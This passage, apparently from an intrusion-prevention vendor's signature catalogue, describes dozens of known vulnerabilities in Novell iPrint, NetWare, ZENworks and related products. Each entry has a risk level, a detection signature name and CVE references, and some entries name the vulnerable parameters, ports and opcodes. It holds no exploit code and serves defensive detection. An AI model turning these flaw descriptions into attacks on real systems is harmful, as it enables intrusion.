Description: There is a buffer overflow vulnerability in Novell iPrint Client. A remote attacker can exploit this vulnerability by enticing an affected user to access a malicious web page to execute arbitrary code in the context of the current user.
Situation: HTTP_SS-Novell-iPrint-Client-ExecuteRequest-debug-Parameter-Buffer-Overflow
File-Text_Novell-iPrint-Client-ExecuteRequest-debug-Parameter-Buffer-Overflow
References:
CVE-2010-4316
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4316
Back to top

Novell-iPrint-Client-For-Windows-IPP-Response-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Novell iPrint Client for Windows
Risk: High
First detected in: sgpkg-ips-529-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell iPrint Client for Windows
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Novell iPrint Client. The vulnerability is due to insufficient validation of IPP responses that can lead to a stack buffer overflow. Successful exploitation can allow an attacker to execute arbitrary code on a target system in the security context of the user. In an unsuccessful attack attempt, the browser may abnormally terminate.
Situation: HTTP_SCH-Novell-iPrint-Client-For-Windows-IPP-Response-Stack-Buffer-Overflow
References:
CVE-2013-1091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1091
BID-59612
http://www.securityfocus.com/bid/59612
OSVDB-92938
http://www.osvdb.org/92938
Back to top

Novell-iPrint-Client-GetDriverSettings-Realm-Parameter-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Novell iPrint Client
Risk: High
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell iPrint Client
Type: Buffer Overflow
Description: There are two stack buffer overflow vulnerabilities in Novell iPrint Client. The vulnerabilities are due to insufficient validation of the Realm parameter to the method GetDriverSettings. A remote attacker can leverage this vulnerability by enticing a target user to open a specially crafted web page. Successful exploitation can allow an attacker to execute arbitrary code on a target system in the security context of the current user. In an unsuccessful attack attempt, the browser may abnormally terminate.
Situation: File-Text_Novell-iPrint-Client-GetDriverSettings-Realm-Parameter-Stack-BOF-2
File-Text_Novell-iPrint-Client-GetDriverSettings-Realm-Parameter-Stack-BOF
References:
CVE-2011-4187
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4187
OSVDB-78955
http://www.osvdb.org/78955
Back to top

Novell-iPrint-Client-GetDriverSettings-Stack-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Novell iPrint Client
Risk: High
First detected in: sgpkg-ips-359-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell iPrint Client for Windows
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell iPrint Client. A remote attacker can exploit this vulnerability by enticing affected users to visit a malicious web page to execute arbitrary code in the context of the current user.
Situation: HTTP_SS-Novell-iPrint-Client-GetDriverSettings-Stack-Buffer-Overflow
File-Text_Novell-iPrint-Client-GetDriverSettings-Stack-Buffer-Overflow
References:
CVE-2011-3173
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3173
BID-44966
http://www.securityfocus.com/bid/44966
BID-50367
http://www.securityfocus.com/bid/50367
OSVDB-76631
http://www.osvdb.org/76631
Back to top

Novell-iPrint-Client-Remote-File-Deletion

About this vulnerability: A vulnerability in Novell iPrint Client
Risk: Moderate
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell iPrint Client for Windows
Type: Malfunction
Description: There is a vulnerability in Novell iPrint Client. The vulnerability is due to a design error in nipplib.dll which is called by the ActiveX control, ienipp.ocx. A remote attacker can exploit this vulnerability by enticing affected users to visit a malicious web page to delete arbitrary files.
Situation: HTTP_SS-Novell-iPrint-Client-Remote-File-Deletion
File-Text_Novell-iPrint-Client-Remote-File-Deletion
References:
CVE-2010-3107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3107
OSVDB-66961
http://www.osvdb.org/66961
Back to top

Novell-iPrint-Client-Stack-Buffer-Overflow-CVE-2010-4321

About this vulnerability: A vulnerability in Novell iPrint Client
Risk: Moderate
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell iPrint Client
Type: Buffer Overflow
Description: There is a stack buffer overflow in Novell iPrint Client. The vulnerability is due to insufficient validation by the ienipp.ocx ActiveX when processing input to one of the vulnerable methods (GetDriverSettings, and GetDriverSettings2.) A remote attacker can leverage this vulnerability by enticing a target user to open a specially crafted web page. Successful exploitation can allow an attacker to execute arbitrary code on a target system. In an unsuccessful attack attempt, the browser may abnormally terminate.
Situation: File-Text_Novell-iPrint-Client-Stack-Buffer-Overflow-CVE-2010-4321
References:
CVE-2010-4321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4321
BID-44966
http://www.securityfocus.com/bid/44966
OSVDB-69357
http://www.osvdb.org/69357
Back to top

Novell-iPrint-Client-Target-Frame-Stack-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Novell iPrint Client
Risk: High
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell iPrint Client for Windows
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell iPrint Client for Windows. The vulnerability is due to a boundary error in the ActiveX control when parsing the target-frame parameter value. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious web page, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Novell-iPrint-Client-Target-Frame-Stack-Buffer-Overflow
File-Text_Novell-iPrint-Client-Target-Frame-Stack-Buffer-Overflow
References:
CVE-2009-1568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1568
BID-37242
http://www.securityfocus.com/bid/37242
Back to top

Novell-iPrint-Client-Volatile-Date-Time-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in Novell iPrint Client ActiveX Control
Risk: High
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell iPrint Client for Windows
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell iPrint Client. The vulnerability is due to a boundary error when parsing malicious persistence parameter values. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious web page, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Novell-iPrint-Client-Volatile-Date-Time-Parsing-Buffer-Overflow
File-Text_Novell-iPrint-Client-Volatile-Date-Time-Parsing-Buffer-Overflow
References:
CVE-2009-1569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1569
BID-37242
http://www.securityfocus.com/bid/37242
Back to top

Novell-iPrint-Server-Attributes-Natural-Language-Buffer-Overflow

About this vulnerability: A vulnerability in Novell iPrint Server
Risk: Moderate
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell iPrint Server; Novell Open Enterprise Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell iPrint Server. The vulnerability is due to insufficient validation when handling the attributes-natural-language attribute. A remote attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable software. Successful exploitation can result in arbitrary code execution in the context of the affected service.
Situation: HTTP_CS-Novell-iPrint-Server-Attributes-Natural-Language-Buffer-Overflow
References:
CVE-2011-4194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4194
BID-51791
http://www.securityfocus.com/bid/51791
OSVDB-78778
http://www.osvdb.org/78778
Back to top

Novell-Messenger-Client-Filename-Parameter-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Novell GroupWise Messenger
Risk: Moderate
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise Messenger
Type: Buffer Overflow
Description: There is a stack buffer overflow in the Novell Messenger client. The vulnerability is due to insufficient validation of the filename parameter with an import command. This could result in a stack buffer overflow. A remote attacker can exploit this vulnerability by enticing a user to follow a malicious URL with the nim: protocol. Successful exploitation could result in arbitrary code being executed with the privileges of the currently logged in user.
Situation: File-Text_Novell-Messenger-Client-Filename-Parameter-Stack-Buffer-Overflow
References:
CVE-2013-1085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1085
OSVDB-91477
http://www.osvdb.org/91477
Back to top

Novell-NetIQ-Privileged-User-Manager-Eval-Policy-Bypass

About this vulnerability: A vulnerability in Novell Privileged User Manager
Risk: High
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell Privileged User Manager
Type: Malfunction
Description: A policy-bypass vulnerability has been reported in Novell NetIQ Privileged User Manager, which could allow remote attackers to compromise a system. The vulnerability is due to an access control weakness when handling calls to the eval method within POST requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a malicious eval request to the vulnerable server. Successful exploitation could result in command execution under the context of the SYSTEM.
Situation: Generic_CS-Novell-NetIQ-Privileged-User-Manager-Eval-Policy-Bypass
HTTP_CS-Novell-NetIQ-Privileged-User-Manager-Eval-Policy-Bypass
References:
OSVDB-87334
http://www.osvdb.org/87334
Back to top

Novell-NetIQ-Privileged-User-Manager-Modifyaccounts-Policy-Bypass

About this vulnerability: A vulnerability in Novell Privileged User Manager
Risk: Moderate
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-1583-5242
Platform: Generic
Software: Novell Privileged User Manager
Type: Malfunction
Description: There is a policy bypass vulnerability in Novell NetIQ Privileged User Manager. The vulnerability is due to an access control weakness when handling a modifyAccounts request. A remote, unauthenticated attacker can exploit this vulnerability by sending a malicious request to a vulnerable server. Successful exploitation could result in code execution under the context of SYSTEM.
Situation: HTTP_CS-Novell-NetIQ-Privileged-User-Manager-Modifyaccounts-Policy-Bypass
References:
OSVDB-87335
http://www.osvdb.org/87335
Back to top

Novell-NetMail-IMAP-Buffer-Overflow

About this vulnerability: A Novell NetMail IMAP Buffer Overflow vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-748-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000
Software: Novell NetMail
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Novell NetMail, versions before 3.52e FTF2, which allows remote attackers to execute arbitrary code via a long argument to the SUBSCRIBE command.
Situation: IMAP_CS-Novell-NetMail-IMAP-Buffer-Overflow
References:
CVE-2006-6761
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6761
BID-21728
http://www.securityfocus.com/bid/21728
OSVDB-31360
http://www.osvdb.org/31360
Back to top

Novell-NetMail-WebAdmin-Username-Stack-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Novell NetMail
Risk: High
First detected in: sgpkg-ips-100-1314
Last changed: sgpkg-ips-1734-5242
Platform: Generic
Software: Novell NetMail
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in the Novell NetMail WebAdmin service. The vulnerability due to a boundary error when performing HTTP basic authentication. A remote user can exploit this vulnerability by sending specially crafted HTTP Basic authentication username data to the 'webadmin.exe' process on TCP port 89. This allows the attacker to execute arbitrary code on the target system with the privileges of the WebAdmin process, normally System.
Situation: HTTP_CS-Novell-NetMail-WebAdmin-Username-Stack-Buffer-Overflow
References:
CVE-2007-1350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1350
BID-22857
http://www.securityfocus.com/bid/22857
Back to top

Novell-NetWare-AFP-Remote-Denial-Of-Service

About this vulnerability: A vulnerability in Novell Netware
Risk: Low
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Novell NetWare
Software: <os>
Type: Malfunction
Description: A denial of service vulnerability exists in Novell Netware. The vulnerability is due to a memory handling error in the AFPTCP.nlm module when processing malformed AFP packets. This vulnerability may be exploited by remote unauthenticated attackers to cause a denial of service condition on the target server by sending malicious packets to TCP port 548. In a successful attack, all existing connections to the affected service are broken and clients must reconnect to the service. An attacker could consistently attack a target system, making it difficult, or impossible, to use the affected service.
Situation: Generic_CS-Novell-NetWare-AFP-Remote-Denial-Of-Service
Back to top

Novell-NetWare-CIFS.NLM-Buffer-Overflow

About this vulnerability: A Novell NetWare CIFS.NLM Buffer Overflow vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Novell NetWare
Software: Novell NetWare CIFS
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Novell NetWare, versions 6.5 SP2 and SP3, 5.1, and 6.0, which allows remote attackers to cause a denial of service condition via an incorrect password length.
Situation: SMB-TCP_Novell-NetWare-CIFS.NLM-Buffer-Overflow
References:
CVE-2005-2852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2852
OSVDB-12790
http://www.osvdb.org/12790
Back to top

Novell-NetWare-FTP-Server-Dele-Command-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Novell Netware
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Novell NetWare
Software: <os>
Type: Buffer Overflow
Description: A code execution vulnerability exists in Novell Netware. The vulnerability is due to a stack buffer overflow in NWFTPD.NLM when processing DELE FTP requests. Remote authenticated attackers can exploit this vulnerability by sending maliciously crafted commands to the affected server. In attack scenarios where code execution is successful the behaviour of the affected server depends entirely on the logic of the injected code, which will be executed within the security context of the affected service. In situations where code execution is not successful the affected service may terminate abnormally, causing a denial of service condition.
Situation: FTP_CS-Novell-NetWare-FTP-Server-Dele-Command-Stack-Buffer-Overflow
References:
CVE-2010-4228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4228
BID-46922
http://www.securityfocus.com/bid/46922
Back to top

Novell-NetWare-FTP-Server-Mkd-Buffer-Overflow

About this vulnerability: A vulnerability in Novell NetWare
Risk: High
First detected in: sgpkg-ips-299-4219
Last changed: sgpkg-ips-1296-5242
Platform: Novell NetWare
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell Netware. The vulnerability is due to a boundary error in NWFTPD.nlm when processing the MKD and RMD FTP commands. Remote authenticated attackers can exploit this vulnerability by sending maliciously crafted commands to the affected server. In successfulattack scenarios, the behavior of the affected server depends on the intention of the injected code, which is executed in the security context of the affected service.
Situation: FTP_CS-Novell-NetWare-FTP-Server-Mkd-Buffer-Overflow
References:
CVE-2010-0625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0625
BID-39041
http://www.securityfocus.com/bid/39041
Back to top

Novell-NetWare-NFS-Portmapper-RPC-Module-Stack-Overflow

About this vulnerability: Buffer overflow vulnerability in Novell NetWare NFS Portmapper daemon
Risk: High
First detected in: sgpkg-ips-256-3038
Last changed: sgpkg-ips-1296-5242
Platform: Novell NetWare
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell NetWare NFS Portmapper daemon due to a boundary error when handling RPC calls. An unauthenticated attacker can exploit this vulnerability by sending a crafted CALLIT RPC call to execute arbitrary code with the privileges of the vulnerable daemon process or to terminate the affected daemon process, and potentially crash the system.
Situation: Generic_UDP-Novell-NetWare-NFS-Portmapper-RPC-Module-Stack-Overflow
SunRPC_TCP-Novell-NetWare-NFS-Portmapper-RPC-Module-Stack-Overflow
References:
BID-36564
http://www.securityfocus.com/bid/36564
OSVDB-58447
http://www.osvdb.org/58447
Back to top

Novell-NetWare-OpenSSH-Buffer-Overflow

About this vulnerability: A vulnerability in Novell Netware
Risk: High
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-1296-5242
Platform: Novell NetWare
Software: <os>
Type: Buffer Overflow
Description: A buffer stack-based overflow vulnerability exists in Novell Netware. The vulnerability is due to a boundary error in SSHD.NLM and SFTP-SVR.NLM modules when processing user sessions. Remote authenticated attackers can exploit this vulnerability to inject and execute arbitrary code with admin privileges via sending an overly long string argument to the affected service. In attack scenarios where code execution is successful the behaviour of the affected server depends entirely on the intention of the injected code. In situations where code execution is not successful the affected service may terminate abnormally, causing a denial of service condition.
Situation: SSH_Novell-NetWare-OpenSSH-Buffer-Overflow
References:
BID-42875
http://www.securityfocus.com/bid/42875
Back to top

Novell-NetWare-Xnfs.nlm-Caller-Name-Xdrdecodestring-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Novell Netware
Risk: Moderate
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-1296-5242
Platform: Novell NetWare
Software: <os>
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Novell Netware. The vulnerability is due to trusting an XDR-encoded caller_name length value within an NLM_TEST request. A malicious length value can lead to a stack buffer overflow. The flaw exists within the XNFS.NLM component. A remote unauthenticated attacker can exploit this vulnerability by sending malicious NFS RPC NLM_TEST requests. In a successful attack scenario, the attacker can execute arbitrary code within the context of the system. In an unsuccessful attack the NFS service may crash resulting in a Denial of Service condition.
Situation: Generic_UDP-Novell-NetWare-Xnfs-Caller-Name-Xdrdecodestring-Heap-Buffer-Overflow
References:
CVE-2011-4191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4191
OSVDB-77316
http://www.osvdb.org/77316
Back to top

Novell-NetWare-Xnfs.nlm-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Novell Netware
Risk: High
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-1296-5242
Platform: Novell NetWare
Software: <os>
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Novell Netware product. The vulnerability is due to insufficient boundary check in xdrDecodeString() while processing NFS RPC requests. The vulnerable daemon explicitly trusts a length field when receiving data which is later copied into a stack buffer, potentially resulting in a stack overflow. The flaw exists within the XNFS.NLM component. A remote unauthenticated attacker can exploit this vulnerability by sending malicious NFS RPC requests. In a successful attack scenario, the attacker can execute arbitrary code within the context of the root user. In an unsuccessful attack the NFS services becomes unresponsive.
Situation: Generic_UDP-Novell-NetWare-Xnfs.nlm-Stack-Buffer-Overflow
References:
CVE-2010-4227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4227
BID-46535
http://www.securityfocus.com/bid/46535
Back to top

Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Novell Netware
Risk: Moderate
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-1296-5242
Platform: Novell NetWare
Software: <os>
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Novell Netware. The vulnerability is due to an insufficient boundary check in xdrDecodeString() while processing certain RPC calls, potentially resulting in a heap buffer overflow. The flaw exists within the XNFS.NLM component. A remote unauthenticated attacker can exploit this vulnerability by sending malicious NFS RPC requests. In a successful attack scenario, the attacker can execute arbitrary code within the context of the system. In an unsuccessful attack the NFS services becomes unresponsive.
Situation: Generic_UDP-Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow
SunRPC_TCP-Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow
References:
CVE-2011-4191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4191
BID-50804
http://www.securityfocus.com/bid/50804
OSVDB-77316
http://www.osvdb.org/77316
Back to top

Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow-2

About this vulnerability: A vulnerability in Novell Netware
Risk: Moderate
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-1296-5242
Platform: Novell NetWare
Software: <os>
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Novell Netware. The vulnerability is due to the trusting of a length value in xdrDecodeString() function while processing certain RPC calls, potentially resulting in a heap buffer overflow. The flaw exists within the XNFS.NLM component. A remote unauthenticated attacker can exploit this vulnerability by sending malicious NFS RPC requests. In a successful attack scenario, the attacker can execute arbitrary code within the context of the system. In an unsuccessful attack the target server may become unresponsive.
Situation: Generic_UDP-Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow-2
References:
CVE-2011-4191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4191
BID-50804
http://www.securityfocus.com/bid/50804
OSVDB-77316
http://www.osvdb.org/77316
Back to top

Novell-Remote-Manager-Off-By-One-Denial-Of-Service

About this vulnerability: A vulnerability in Novell Remote Manager
Risk: High
First detected in: sgpkg-ips-471-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Novell Remote Manager
Type: Input Validation
Description: A denial-of-service vulnerability has been reported in Novell Remote Manager. The vulnerability is due to insufficient validation of the HTTP Host header values. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously HTTP request that contains crafted Host header to the vulnerable service. Successful exploitation of this vulnerability would lead to a denial-of-service condition.
Situation: HTTP_CSH-Novell-Remote-Manager-Off-By-One-Denial-Of-Service
References:
OSVDB-84444
http://www.osvdb.org/84444
Back to top

Novell-Sentinel-Log-Manager-Retention-Policy-Security-Restriction-Bypass

About this vulnerability: A vulnerability in Novell Sentinel Log Manager
Risk: High
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell Sentinel Log Manager
Type: Malfunction
Description: A policy bypass vulnerability exists in Novell Sentinel Log Manager. The vulnerability is due to insufficient validation of incoming requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted request to the affected system. This can result in the creation of unauthorized data retention policies.
Situation: HTTP_CS-Novell-Sentinel-Log-Manager-Retention-Policy-Security-Restriction-Bypass
References:
OSVDB-85955
http://www.osvdb.org/85955
Back to top

Novell-Service-Desk-Clientimportuploadform-Directory-Traversal

About this vulnerability: A vulnerability in Novell Service Desk
Risk: Moderate
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell Service Desk
Type: Input Validation
Description: The filename of uploaded files is improperly validated in the clientImportUploadForm form. This causes a vulnerability which can allow an attacker to run arbitrarry code on the target system.
Situation: HTTP_CS-Novell-Service-Desk-Clientimportuploadform-Directory-Traversal
References:
CVE-2016-1593
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1593
Back to top

Novell-Teaming-Ajaxuploadimagefile-Remote-Code-Execution

About this vulnerability: A vulnerability in Novell Teaming
Risk: High
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell Teaming
Type: Input Validation
Description: A remote code execution vulnerability exists in Novell Teaming. The flaw is due to an input validation when parsing image uploads. A remote attacker could exploit this vulnerability by uploading a maliciously crafted file. Successful exploitation would result in arbitrary files of any type (such as .bat, .exe., .jsp) uploaded to any directory on a target system, including startup folders and the Novell Teaming website. The behaviour of the affected host depends entirely on the intention of the attacker-controlled file.
Situation: HTTP_CS-Novell-Teaming-Ajaxuploadimagefile-Remote-Code-Execution
References:
CVE-2010-2773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2773
BID-41795
http://www.securityfocus.com/bid/41795
Back to top

Novell-ZENworks-Asset-Management-Directory-Traversal

About this vulnerability: An attempt to exploit a vulnerability in Novell ZENworks Asset Management detected
Risk: High
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell ZENworks Asset Management
Type: Directory Traversal
Description: A Buffer Overflow vulnerability in Novell ZENworks Asset Management 7.5 which allows remote attackers to execute arbitrary code by uploading an executable file.
Situation: HTTP_CS-Novell-ZENworks-Asset-Management-Directory-Traversal
References:
CVE-2011-2653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2653
BID-50966
http://www.securityfocus.com/bid/50966
OSVDB-77583
http://www.osvdb.org/77583
Back to top

Novell-ZENworks-Asset-Management-File-Upload-Directory-Traversal

About this vulnerability: An attempt to exploit a vulnerability in Novell ZENworks
Risk: High
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Input Validation
Description: A directory traversal vulnerability exists in Novell ZENworks Configuration Management. The vulnerability is due to insufficient input validation within the ZENworks Server's FileUploadServlet. Remote unauthenticated attackers can leverage this vulnerability to upload malicious files anywhere onto the target server.
Situation: HTTP_CSU-Novell-ZENworks-Asset-Management-File-Upload-Directory-Traversal
References:
CVE-2010-4229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4229
BID-47295
http://www.securityfocus.com/bid/47295
OSVDB-71872
http://www.osvdb.org/71872
Back to top

Novell-ZENworks-Asset-Management-Web-Console-Information-Disclosure

About this vulnerability: A vulnerability in Novell ZENworks Asset Management
Risk: High
First detected in: sgpkg-ips-487-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Asset Management
Type: Malfunction
Description: An information disclosure vulnerability exists in Novell ZENworks Asset Management. The vulnerability is due to hard coded credentials in the GetFile_Password and GetConfigInfo_Password functions. These functions allow access to the file system and system configuration parameters. A remote unauthenticated attacker could exploit this vulnerability by invoking these functions. Successful exploitation could allow access to the file system with SYSTEM privileges.
Situation: HTTP_CRL-Novell-ZENworks-Asset-Management-Web-Console-Information-Disclosure
References:
CVE-2012-4933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4933
Back to top

Novell-ZENworks-Configuration-Management-Directory-Traversal

About this vulnerability: A Novell ZENworks Configuration Management Directory Traversal vulnerability.
Risk: High
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Directory Traversal
Description: A directory traversal vulnerability in Novell ZENworks Configuration Management, versions 11.1 and 11.1a, in the Preboot Service, which allows remote attackers to read arbitrary files via an opcode 0x21 request.
Situation: Generic_CS-Novell-ZENworks-Configuration-Management-Directory-Traversal
References:
CVE-2012-2215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2215
OSVDB-80230
http://www.osvdb.org/80230
Back to top

Novell-ZENworks-Configuration-Management-DirectoryViewer-Information-Disclosure

About this vulnerability: A vulnerability in Novell ZENworks Configuration Management
Risk: Moderate
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Directory Traversal
Description: An information disclosure vulnerability exists in Novell ZENworks Configuration Management. The vulnerability is due to lack of sanitization of the dirname parameter within the DirectoryViewer class. By sending crafted requests to the target server, a remote attacker can leverage this vulnerability to disclose directory contents from the server.
Situation: HTTP_CRL-Novell-ZENworks-Configuration-Management-DirectoryViewer-Information-Disclosure
References:
CVE-2015-0785
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0785
Back to top

Novell-ZENworks-Configuration-Management-File-Upload

About this vulnerability: A vulnerability in Novell ZENworks Configuration Management
Risk: Moderate
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Input Validation
Description: There is a file upload vulnerability in Novel ZENworks Configuration Management. This vulnerability is caused by insufficient authentication and a directory traversal in the Control Center module that allows arbitrary file uploads. Remote, unauthenticated attackers could exploit this vulnerability by sending crafted packets to the affected service. Successful exploitation would allow the attacker to execute arbitrary code on the machine running the vulnerable service with administrative privileges.
Situation: HTTP_CS-Novell-ZENworks-Configuration-Management-File-Upload
References:
CVE-2013-1080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1080
OSVDB-91627
http://www.osvdb.org/91627
Back to top

Novell-ZENworks-Configuration-Management-FileViewer-Information-Disclosure

About this vulnerability: A vulnerability in Novell ZENworks Configuration Management
Risk: Moderate
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Directory Traversal
Description: An information disclosure vulnerability exists in Novell ZENworks Configuration Management. The vulnerability is due to lack of sanitization on the filename parameter within the FileViewer class. By sending crafted requests to the target server, a remote attacker can leverage this vulnerability to disclose arbitrary file contents from the server.
Situation: HTTP_CRL-Novell-ZENworks-Configuration-Management-FileViewer-Information-Disclosure
References:
CVE-2015-0783
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0783
Back to top

Novell-ZENworks-Configuration-Management-Getstoredresult-SQL-Injection

About this vulnerability: A vulnerability in Novell ZENworks Configuration Management
Risk: Moderate
First detected in: sgpkg-ips-644-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Input Validation
Description: An SQL injection vulnerability exists in ZENworks Configuration Management. The vulnerability is due to insufficient sanitization of the input parameter in the GetReRequestData method of the GetStoredResult class before it is used in an SQL query. A remote attacker can exploit this vulnerability by sending a crafted message to a target server, execute arbitrary SQL code, and access sensitive information.
Situation: HTTP_CRL-Novell-ZENworks-Configuration-Management-Getstoredresult-SQL-Injection
References:
CVE-2015-0780
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0780
Back to top

Novell-ZENworks-Configuration-Management-Preboot-Directory-Traversal

About this vulnerability: A vulnerability in Novell ZENworks Configuration Management
Risk: High
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Novell ZENworks Configuration Manager in its PreBoot service, novell-pbserv.exe. The vulnerability is because the preboot service listening on port 998/TCP supports an opcode that allows files to be downloaded through directory traversal, without sanitizing paths that include "..". A remote unauthenticated attacker can exploit this vulnerability to disclose the contents of arbitrary files on a vulnerable system.
Situation: Generic_CS-Novell-ZENworks-Configuration-Management-Preboot-Directory-Traversal
References:
CVE-2013-3706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3706
BID-65912
http://www.securityfocus.com/bid/65912
OSVDB-104002
http://www.osvdb.org/104002
Back to top

Novell-ZENworks-Configuration-Management-Preboot-Policy-Service-Buffer-Overflow

